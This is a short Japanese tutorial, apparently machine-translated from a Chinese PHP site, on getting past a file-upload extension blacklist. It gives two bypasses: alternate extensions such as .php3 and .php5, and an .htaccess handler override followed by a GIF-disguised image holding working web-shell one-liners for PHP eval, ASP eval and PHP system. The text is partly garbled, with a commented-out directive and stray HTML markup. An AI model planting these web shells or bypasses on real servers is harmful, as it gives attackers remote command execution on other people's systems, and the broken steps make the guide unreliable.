この記事では主に、ファイルをアップロードしてブラックリストを回避する方法を紹介します。これには特定の参考値があります。今、あなたと共有します。必要な友達はそれを参照できます。
このレベルでは主に、アップロードサフィックス. 、asp、php、jsp などのサフィックスを制限し、アップロードは許可されません。
位置 1: このバイパス方法は、サフィックスを .php3、php5 などに変更することです。ブラックリストの検証は次のとおりです ('.asp'、'.aspx'、'.php'、'.jsp') ) を使用すると、php3、php5... およびサーバーで解析できるその他のサフィックス名をアップロードできます
##ポジション 2: ファイル解析ルールをバイパスするように書き換えます
1. まずアップロードします。次の内容を含む
.htaccess という名前のファイルをアップロードします:
# SetHandler application/x-httpd-php
2. 1.jpg スクリプトをアップロードします
内容:GIF89a <?php eval($_POST['joker']);?> <%eval request("joker")%> <?php system($_POST['cmd']);?>
<span style="margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
上記がこの記事の全内容です。関連コンテンツについては、PHP 中国語 Web サイトをご覧ください。
関連する推奨事項:PHP は Azure Storage Blob を使用してファイルをアップロードします
以上がファイルをアップロードするときにブラックリストを回避する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。